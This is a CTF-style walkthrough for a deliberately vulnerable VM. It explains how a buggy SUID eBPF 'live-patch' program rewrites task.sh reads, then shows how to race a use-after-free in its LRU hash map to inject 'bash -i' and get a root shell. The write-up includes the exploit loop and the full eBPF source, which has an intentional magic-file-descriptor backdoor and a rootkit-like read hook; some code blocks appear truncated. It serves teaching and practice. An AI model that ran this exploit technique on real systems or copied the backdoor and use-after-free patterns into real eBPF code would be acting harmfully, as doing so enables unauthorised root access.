A CTF style vulnerable box where you need to find and exploit a mistake in an eBPF program that allows privilege escalation to root.

VBox Link: ds-process-station.ova (681 MB)
Qemu Link: TODO :D


Download the .ova and import the appliance into Virtualbox. Start the machine and log in directly from the virtual console.

Username: datascience
Password: password

Your goal is to read /root/flag.txt by exploiting a vulnerability in the eBPF programs and other utilities in the ~/process-utils folder.

Scroll down for the walkthrough (spoilers!).


Here are all the hints available on the box, if you’d prefer to try to solve it yourself. You can scroll past the things to get to the step by step walkthrough.

Hint 1

The live-patch binary installs an eBPF program that live patches the task.sh script executed by the task-exec binary.

Hint 2

You can check loaded eBPF programs with bpftool prog list.

Hint 3

You can inspect the contents of running eBPF programs with bpftool prog dump xlated id <number of program>.

Hint 4

How are patches to task.sh tracked? In what map?

Hint 5

What is the difference between BPF_ANY and BPF_NOEXIST when calling bpf_map_update_elem?

Hint 6

What is the difference between BPF_MAP_TYPE_LRU_PERCPU_HASH and BPF_MAP_TYPE_LRU_HASH?

Hint 7

What happens when an element is deleted from an eBPF map but a reference to that memory address is kept and used?


I am going to assume you have imported the appliance into virtualbox or ported it to your hypervisor of choice, and have logged in as the datascience user with the password password. After logging in to the box you will see a README.md file. The contents of that file are as follows.

# Tips & Hints

The goal is to use the files you find under ~/process-utils to escalate to root
and read /root/flag.txt. You will do this by exploiting a vulnerability in the
BPF programs contained by `live-patch`.

You can probably read the flag another way, but that's no fun.

You might be able to game the solution without understanding why it worked. Try
to understand why it works.

Everything you need is already on this box. You should not need to install,
transfer, or update anything.

You will not need to modify the files on disk in the ~/process-utils directory.

You can run multiple programs at one time with tmux or screen.

Exploration & process-utils folder

Besides the readme and hints, we can see a process-utils folder in the user’s home directory. Since we are working with eBPF, we likely have bpftool on this system. It’s not in the path, but it is available under /sbin/bpftool. For the purposes of this challenge, I set the SUID bit so we can run it as a regular user.

Note: The purpose of including bpftool was to make dumping eBPF bytecode easier. I will be demonstrating a solution that does not require bpftool. However, bpftool is very powerful and can definitely be used to complete this challenge. This is left as an exercise to the reader.

datascience@etl:~$ ls -l process-utils/
total 1476
-rwsr-xr-x 1 root root 1490576 Sep 12 12:47 live-patch
-rwsr-xr-x 1 root root   16384 Sep  5 14:05 task-exec
-rw-r--r-- 1 root root     216 Sep 12 12:36 task.sh
datascience@etl:~$ ls -l /sbin/bpftool
-rwsr-xr-x 1 root root 544776 Aug 26 15:47 bpftool

We can see the live-patch and task-exec binaries both have their SUID bits set, so we can run them with root privileges. The task.sh script is not runnable directly or modifiable.

Let’s see what task.sh does.

datascience@etl:~/process-utils$ cat task.sh

set -Eeuxo pipefail

echo "Please run the live patcher to ensure you execute the latest version of the script."

ls -latr /home/*
ls -latr /root/*

# TODO: copy and format data from root user to DS user

If we run task.sh with bash task.sh, we’ll see it lists out our home folder, attempts to list the root folder and gets an access denied, and prints the following message.

Please run the live patcher to ensure you execute the latest version of the script.

If we run the SUID binary task-exec, we can see the same warning, except this time the contents of /root are successfully displayed.

+ ls -latr /root/flag.txt
-rw-r--r-- 1 root root 53 Sep  5 14:56 /root/flag.txt

So we can assume task-exec runs task.sh with root privileges.

Running the Live Patcher

We can now try running the live-patch binary.

datascience@etl:~process-utils$ ./live-patch
Task patcher is now running!

From the message, we can assume this applies some kind of live patching to the task program, or script, or both.

(N.B., the live patcher looks for programs opening any file named task.sh and replaces the contents when you attempt to read() the file, without modifying the file on disk, just some rootkit type stuff)

Let’s run this in the background…

datascience@etl:~process-utils$ tmux new -s lp
datascience@etl:~process-utils$ ./live-patch
Task patcher is now running!

Ctrl+B, d to drop it to the background and we can check what’s happening with task.sh.

datascience@etl:~process-utils$ cat task.sh
echo 'Patch script not set.'
exit 0
her to ensure you execute the latest version of the script."

ls -latr /home/*
ls -latr /root/*

# TODO: copy and format data from root user to DS user

The beginning of the script has been replaced with a message that reads “Patch script not set.” If we try to run task-exec now we can see it dumps out these modified contents and exits without doing anything.

Perusing the eBPF Bytecode

But what is the live-patch program actually doing? We can check that with bpftool! If you run /sbin/bpftool prog list you should see something like the following.

97: kprobe  name entry_do_filp_o  tag 7bc6868cc23d6e95  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 1112B  jited 660B  memlock 4096B  map_ids 22,25,24,27
        btf_id 118
99: kprobe  name exit_do_filp_op  tag de0dad17356df798  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 112B  jited 74B  memlock 4096B  map_ids 22,27
        btf_id 118
100: kprobe  name entry_vfs_read  tag 054da101587b33d9  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 184B  jited 116B  memlock 4096B  map_ids 22,23,27
        btf_id 118
101: kprobe  name exit_vfs_read  tag 2dccbd892dbb8cb9  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 2232B  jited 1269B  memlock 4096B  map_ids 24,23,27
        btf_id 118
102: kprobe  name entry_read  tag 131f759aba032ef9  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 224B  jited 133B  memlock 4096B  map_ids 28,27
        btf_id 118
103: kprobe  name exit_read  tag a04f5eef06a7f555  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 16B  jited 16B  memlock 4096B  map_ids 27
        btf_id 118
104: kprobe  name enter_write  tag bd18dd76ddc1c645  gpl
        loaded_at 2024-09-12T18:09:36+0000  uid 0
        xlated 544B  jited 288B  memlock 4096B  map_ids 28,24,27
        btf_id 118

From the names of the loaded kprobes we can assume that something is happening with file opens (entry_do_filp_o an exit_do_filp_op), reads (entry_vfs_read, exit_vfs_read, entry_read, and exit_read), and writes (enter_write). From the map_ids of each program we can see that the file open kprobes share a unique map id 22 with the entry_vfs_read kprobe, so we can assume they are preparing and sharing some data with a read entry probe (open must happen before read). We can also see that the entry and exit vfs_read kprobes share a unique map id 23, so we can assume the entry probe is preparing some data to be used by the exit probe (kprobes fire before kretprobes). Finally, we see the enter_write kprobe shares a unique map id 24 with the file open entry probe and the vfs_read exit probe, so there is probably some data being collected during one of those calls that’s relevant to the others.

(N.B., the entry_read and exit_read probes are red herrings, so I’m just going to ignore them)

Finding the Vulnerability

With the power of I-wrote-this-challenge-so-I-know-where-to-look, let’s start by dumping the contents of enter_write. You will probably want to pipe the output to less so it’s easier to scroll through. There’s a good bit of output, so I’m going to cut it to just the relevant parts.

datascience@etl:~$ /sbin/bpftool prog dump xlated id 104
int enter_write(struct pt_regs * ctx):
; int BPF_KSYSCALL(enter_write, int fd, const void *buf, size_t count) {

// a bunch of stuff here to read function call args and save into variables

; if (fd == 0xDEADBEE) {
  29: (55) if r8 != 0xdeadbee goto pc+36
  30: (79) r2 = *(u64 *)(r10 -80)
  31: (b7) r1 = 0
; u64 idx = 0;
  32: (7b) *(u64 *)(r10 -8) = r1
; struct task_detail td = {

// a bunch of stuff setting up an empty struct

; int ret = bpf_probe_read(&td.str, count, buf);

// a bunch of error checking stuff for the probe read

  59: (07) r2 += -8
  60: (bf) r3 = r10
  61: (07) r3 += -80
  62: (18) r1 = map[id:24]
  64: (b7) r4 = 1
  65: (85) call htab_lru_map_update_elem#192480
; int BPF_KSYSCALL(enter_write, int fd, const void *buf, size_t count) {
  66: (b7) r0 = 0
  67: (95) exit

eBPF call arguments are stored in order in r1, r2, r3, and so on. From the dumped code we can see:

  1. the kprobe checks if the file descriptor passed to write() is 0xDEADBEE
  2. if it is, we start preparing a task_detail struct and copy the contents of buf into it
  3. we then store this task_detail struct in a map with id 24 by calling htab_lru_map_update_elem with r1 being the map id 24, r2 being a pointer to an empty index value, r3 being a pointer to the task_detail, and r4 = 1 being the flag BPF_NOEXIST

This means we can store any string in this hashtable map by calling write with the special file descriptor 0xDEADBEE if a string is not already stored in the map.

(N.B., yes this is a lazy backdoor, you could also use bpftool to write to the map, I couldn’t contrive a reasonable way to update the map without a ton of effort so we got a super special secret file descriptor value)

Where is this relevant? We know that map id 24 was also used in exit_vfs_read and entry_do_filp_o. Let’s look at the relevant sections from those programs by dumping their contents and searching for references to map[id:24].

// entry_do_filp_open
; bpf_map_update_elem(&task_detail, &id, td, BPF_ANY);
 132: (18) r1 = map[id:24]
 134: (bf) r3 = r0
 135: (b7) r4 = 0
 136: (85) call htab_lru_map_update_elem#192480

We can see the file open probe only updates the contents of the map. Crucially, r4 = 0 is the flag BPF_ANY, which means this map will be updated when a file is opened regardless of what contents the map already holds. This is where the “Patch script not set.” message is likely saved.

// exit_vfs_read
; struct task_detail *td = bpf_map_lookup_elem(&task_detail, &idx);
   9: (18) r1 = map[id:24]
  11: (85) call __htab_map_lookup_elem#183728
  12: (15) if r0 == 0x0 goto pc+4
  13: (71) r1 = *(u8 *)(r0 +35)
  14: (55) if r1 != 0x0 goto pc+1
  15: (72) *(u8 *)(r0 +35) = 1
  16: (07) r0 += 56
  17: (bf) r6 = r0
; if (td == NULL) {
  18: (15) if r6 == 0x0 goto pc+258
  19: (bf) r2 = r10
  20: (07) r2 += -16
; bpf_map_delete_elem(&task_detail, &idx);
  21: (18) r1 = map[id:24]
  23: (85) call htab_lru_map_delete_elem#192112

We can see that exit_vfs_read actually looks up the struct stored in this map and, after some verifier-pleasing null checks, deletes the contents of the map. Later on, we can see the contents of this struct being copied onto the stack, and then into the userspace buffer provided to the read call.

; long write_ret = bpf_probe_write_user(buf, stack_string, STR_MAX);
 274: (79) r1 = *(u64 *)(r10 -152)
 275: (b7) r3 = 64
 276: (85) call bpf_probe_write_user#-69312

But how is that possible if the contents of the map have been deleted? Well, it turns out they’re not. Let’s look at the kernel source for htab_lru_map_delete_elem.

static int htab_lru_map_delete_elem(struct bpf_map *map, void *key)
	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
	struct hlist_nulls_head *head;
	struct bucket *b;
	struct htab_elem *l;
	unsigned long flags;
	u32 hash, key_size;
	int ret;

	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&

	key_size = map->key_size;

	hash = htab_map_hash(key, key_size, htab->hashrnd);
	b = __select_bucket(htab, hash);
	head = &b->head;

	ret = htab_lock_bucket(htab, b, hash, &flags);
	if (ret)
		return ret;

	l = lookup_elem_raw(head, hash, key, key_size);

	if (l)
		ret = -ENOENT;

	htab_unlock_bucket(htab, b, hash, flags);
	if (l)
		htab_lru_push_free(htab, l);
	return ret;

After grabbing a lock we check that the element exists and if so we delete the hash node and free the memory. Go to the elixir page and click around, you’ll see at no point is the memory itself cleared out. Why would it be? Don’t use memory after freeing it. Get good, eBPF programmer.

Another crucial thing to notice is that this is an LRU hash map and not a per-CPU LRU hash map. This means we can modify the values for all CPUs from any CPU, instead of using a special per-CPU helper (which the loaded program does not have).

(N.B., if it were per-CPU you could just use bpftool instead, but the point is to find something in the BPF code itself you can use; because the write kprobe updates the map with BPF_NOEXIST we must wait until after the entry is freed but before it is used to modify it)

Exploiting the Vulnerability

Since task-exec will run anything in task.sh (or that gets patched into task.sh) as root, we just have to race the UAF and insert our own command. Let’s call it solution.c and run it in a new tmux window.

void main() {
    char * or = "bash -i\n";
    for (;;) {
        write(0xDEADBEE, or, strlen(or));
datascience@etl:~$ tmux new -s solution
datascience@etl:~$ cc solution.c
datascience@etl:~$ ./a.out

Then, from the process-utils/ directory, we keep running task-exec until we win the race and get a root shell.

datscience@etl:~$ while true; do ./task-exec; done

# a bunch of stuff happens here over and over

root@etl:~/process-utils# cat /root/flag.txt

live-patch.bpf.c source code

For reference, the full eBPF source code.

#include "vmlinux.h"
#include <bpf/bpf_core_read.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <string.h>

#define STR_MAX 64

char LICENSE[] SEC("license") = "Dual BSD/GPL";

struct task_detail {
  u32 len;
  char str[STR_MAX];

struct {
  __type(key, u64);
  __type(value, u64);
  __uint(max_entries, 512);
} file_map SEC(".maps");

struct {
  __type(key, u64);
  __type(value, u64);
  __uint(max_entries, 512);
} buf_map SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_LRU_HASH);
  __type(key, u64);
  __type(value, struct task_detail);
  __uint(max_entries, 16);
} task_detail SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_ARRAY);
  __type(key, u32);
  __type(value, struct task_detail);
  __uint(max_entries, 1);

} td_scratch SEC(".maps");

static __always_inline int startswith(const char *s, const char *t, int len) {
  for (int i = 0; i < (len & 0xFF); i++) {
    if (s[i] != t[i]) {
      return -1;
  return 0;

static __always_inline int entry_open_common(const char *pathname) {
  u64 key = bpf_get_current_pid_tgid();
  u64 val = -1;
  char buf[64];

  int ret = bpf_probe_read_str(&buf, sizeof(buf), pathname);
  if (ret != 8) {
    return 0;

  if (startswith(buf, "task.sh", 7) == 0) {
    bpf_map_update_elem(&file_map, &key, &val, BPF_ANY);
    u32 idx = 0;
    struct task_detail *td = bpf_map_lookup_elem(&td_scratch, &idx);
    if (td == NULL) {
      return 0;
        td->str, "#!/bin/bash\necho 'Patch script not set.'\nexit 0\n\0", 49);
    td->len = 49;
    u64 id = 0;
    bpf_map_update_elem(&task_detail, &id, td, BPF_ANY);

  return 0;

int BPF_KPROBE(entry_do_filp_open, int dfd, struct filename *pathname,
               const struct open_flags *op) {
  const char *filename = BPF_CORE_READ(pathname, name);
  return entry_open_common(filename);

int BPF_KRETPROBE(exit_do_filp_open, u64 ret) {
  u64 pid_tgid = bpf_get_current_pid_tgid();
  int suc = bpf_map_update_elem(&file_map, &pid_tgid, &ret, BPF_EXIST);
  return 0;

// check if FD is the FD of task.sh and if so, check if we're meant to inject
// anything, and if so, save the userspace buffer for the kretprobe
int BPF_KPROBE(entry_vfs_read, struct file *file, char *buf, size_t count,
               loff_t *pos) {
  u64 pid_tgid = bpf_get_current_pid_tgid();
  u64 *map_file = bpf_map_lookup_elem(&file_map, &pid_tgid);
  if (map_file != NULL && *map_file == (u64)file) {
    bpf_map_update_elem(&buf_map, &pid_tgid, &buf, BPF_NOEXIST);

  return 0;

int BPF_KRETPROBE(exit_vfs_read, ssize_t ret) {
  if (ret <= 0) {
    return 0;

  u64 pid_tgid = bpf_get_current_pid_tgid();
  u64 idx = 0;
  struct task_detail *td = bpf_map_lookup_elem(&task_detail, &idx);
  if (td == NULL) {
    return 0;
  bpf_map_delete_elem(&task_detail, &idx);

  void **user_buf = bpf_map_lookup_elem(&buf_map, &pid_tgid);
  if (user_buf == NULL) {
    return 0;
  void *buf = *user_buf;

  if (td->len <= ret) {
    char stack_string[STR_MAX] = {0};
    __builtin_memcpy(stack_string, &td->str, STR_MAX);
    long write_ret = bpf_probe_write_user(buf, stack_string, STR_MAX);

  return 0;

int BPF_KSYSCALL(entry_read, int fd, void *buf, size_t count) {
  return 0;

int BPF_KRETPROBE(exit_read, long ret) {
  return 0;

// kprobe on write to check magic FD and copy buffer to scratch space for
// overwriting
int BPF_KSYSCALL(enter_write, int fd, const void *buf, size_t count) {
  if (fd == 0xDEADBEE) {
    u64 idx = 0;
    struct task_detail td = {
        .len = count,
        .str = {0},
    count &= 0b111111;
    int ret = bpf_probe_read(&td.str, count, buf);
    if (ret != 0) {
      return 0;
    bpf_map_update_elem(&task_detail, &idx, &td, BPF_NOEXIST);
  return 0;